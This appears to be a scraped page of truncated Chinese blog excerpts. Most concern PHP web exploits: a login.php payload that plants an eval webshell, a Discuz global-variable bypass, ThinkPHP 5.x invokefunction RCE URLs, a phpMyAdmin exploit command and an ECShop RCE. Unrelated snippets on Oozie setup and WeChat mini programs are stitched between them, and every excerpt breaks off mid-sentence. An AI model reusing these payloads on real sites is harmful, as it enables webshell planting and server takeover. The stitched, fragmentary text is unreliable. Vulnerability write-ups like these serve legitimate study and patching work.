在其域名后加上这样一段代码: login.php?makehtml=1&chdb[htmlname]=xx.php& chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>. 这段代码 的意思利用login.php文件将 <?php%20@eval($_POST[cmd]);?> 这段代码写入到网站缓存目录 cache的xx.php文件中.“<?php%20@eval($_POST[cmd]);?&…
一.漏洞原理: 由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞. include/global.func.php代码里: 01 function daddslashes($string, $force = 0) { 02         !defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc…
由于框架对控制器名没有进行足够的检测会导致在没有开启强制路由的情况下可能的getshell漏洞.最直接的影响为index.php直接被篡改成首页html的内容! 5.0版本 thinkphp/library/think/App.php  类的module方法的获取控制器的代码后面加上 if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {    throw new HttpException(404, 'controller not exi…
影响范围 4.0.10.16之前4.0.x版本 4.4.15.7之前4.4.x版本 4.6.3之前4.6.x版本(实际上由于该版本要求PHP5.5+,所以无法复现本漏洞) 需要登录,且能够写入数据 poc https://www.exploit-db.com/exploits/40185/ python3 1.py -c 'system(id);' -u root -p root -d test http://192.168.49.2:8080/…
环境保留:2019.4.4-4.10 环境搭建: 这里我使用的是:vulhub vulhub目录结构:vulhub/thinkphp/5-rcess 测试地址(开放一段时间供大家学习):http://bugbank.51vip.biz:29021 成因分析: Paper的这篇文章分析的很到位:https://paper.seebug.org/760/ payload演示: http://bugbank.51vip.biz:29021/index.php?s=index/\think\app/in…
http://192.168.49.2:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1 http://192.168.49.2:8080/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=…
不多说,直接上干货! 前期博客 Oozie安装部署 问题描述 bin/oozie-setup.sh prepare-war 解决办法 [hadoop@bigdatamaster bin]$ pwd /home/hadoop/app/oozie--cdh5.5.4/bin [hadoop@bigdatamaster bin]$ ./addtowar.sh -inputwar $OOZIE_HOME/oozie.war -outputwar $OOZIE_HOME/oozie-server/weba…
虽然网上已经有几篇公开的漏洞分析文章,但都是针对5.1版本的,而且看起来都比较抽象:我没有深入分析5.1版本,但看了下网上分析5.1版本漏洞的文章,发现虽然POC都是一样的,但它们的漏洞触发原因是不同的.本文分析5.0.22版本的远程代码执行漏洞,分析过程如下: (1)漏洞复现 环境php5.5.38+apache. POC:http://172.19.77.44/thinkphp_5.0.22_with_extend/public/index.php?s=index/think\app/inv…
2018年9月1日,阿里云态势感知发布预警,近日利用ECShop全系列版本的远程代码执行漏洞进行批量化攻击量呈上升趋势.该漏洞利用简单且危害较大,黑客可通过WEB攻击直接获得服务器权限. 漏洞原理 该漏洞产生的根本原因在于ECShop系统的user.php文件中,display函数的模板变量可控,导致注入,配合注入可达到远程代码执行的效果.使得攻击者无需登录等操作,直接可以获得服务器的权限. 首先从user.php文件入手,代码中可以看到,系统读取HTTP_REFERER传递过来的 内容赋值给$…
微信小程序0.11.122100版本新功能解析   新版本就不再吐槽了,整的自己跟个愤青似的.人老了,喷不动了,把机会留给年轻人吧.下午随着新版本开放,微信居然破天荒的开放了开发者论坛.我很是担心官方能不能承受住开发者的愤怒. 还好,小龙兄很聪明,发帖要审核.我就在帖子里反馈了下bug,顺便劝了下腾讯,做不好小程序还是去卖皮肤吧.10秒钟后帖子就被封了. 群里有同学问,你不是说要大家支持小程序么,毕竟是国人这么多年唯一有点儿希望比肩iOS和Android生态的平台.当然要支持.但该喷的还是得喷,…